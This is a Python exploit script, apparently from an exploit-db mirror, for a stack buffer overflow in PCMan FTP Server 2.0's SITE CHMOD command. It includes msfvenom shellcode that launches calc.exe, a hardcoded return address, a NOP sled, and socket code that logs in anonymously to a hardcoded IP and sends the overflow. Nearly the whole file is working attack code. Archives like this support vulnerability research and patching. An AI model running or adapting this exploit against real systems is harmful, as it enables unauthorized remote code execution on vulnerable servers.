exploit-db-mirror/platforms/windows/remote/40713.py

#!/usr/bin/env python
#-*- coding: utf-8 -*-

# Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command 
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a

import socket

# shellcode with metasploit:
#       msfvenom -p windows/exec CMD=calc.exe -b'\x00\x0A\x0D' -f c

ret = "\xD7\x30\x6B\x7E" #SHELL32.dll

shellcode = ("\xdb\xd6\xbf\x70\x7b\xf3\x98\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x74\x99\x06\x64\x9c\xdf"
"\xe9\x95\x5c\x80\x60\x70\x6d\x80\x17\xf0\xdd\x30\x53\x54\xd1"
"\xbb\x31\x4d\x62\xc9\x9d\x62\xc3\x64\xf8\x4d\xd4\xd5\x38\xcf"
"\x56\x24\x6d\x2f\x67\xe7\x60\x2e\xa0\x1a\x88\x62\x79\x50\x3f"
"\x93\x0e\x2c\xfc\x18\x5c\xa0\x84\xfd\x14\xc3\xa5\x53\x2f\x9a"
"\x65\x55\xfc\x96\x2f\x4d\xe1\x93\xe6\xe6\xd1\x68\xf9\x2e\x28"
"\x90\x56\x0f\x85\x63\xa6\x57\x21\x9c\xdd\xa1\x52\x21\xe6\x75"
"\x29\xfd\x63\x6e\x89\x76\xd3\x4a\x28\x5a\x82\x19\x26\x17\xc0"
"\x46\x2a\xa6\x05\xfd\x56\x23\xa8\xd2\xdf\x77\x8f\xf6\x84\x2c"
"\xae\xaf\x60\x82\xcf\xb0\xcb\x7b\x6a\xba\xe1\x68\x07\xe1\x6f"
"\x6e\x95\x9f\xdd\x70\xa5\x9f\x71\x19\x94\x14\x1e\x5e\x29\xff"
"\x5b\x90\x63\xa2\xcd\x39\x2a\x36\x4c\x24\xcd\xec\x92\x51\x4e"
"\x05\x6a\xa6\x4e\x6c\x6f\xe2\xc8\x9c\x1d\x7b\xbd\xa2\xb2\x7c"
"\x94\xc0\x55\xef\x74\x29\xf0\x97\x1f\x35")

buffer = '\x90'*30 + shellcode
buffer2 = '\x41' * 2001 + ret + buffer + '\x43'*(749-len(buffer))
print "Sending Buffer"

s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('SITE CHMOD' + buffer2 + '\r\n')
s.close()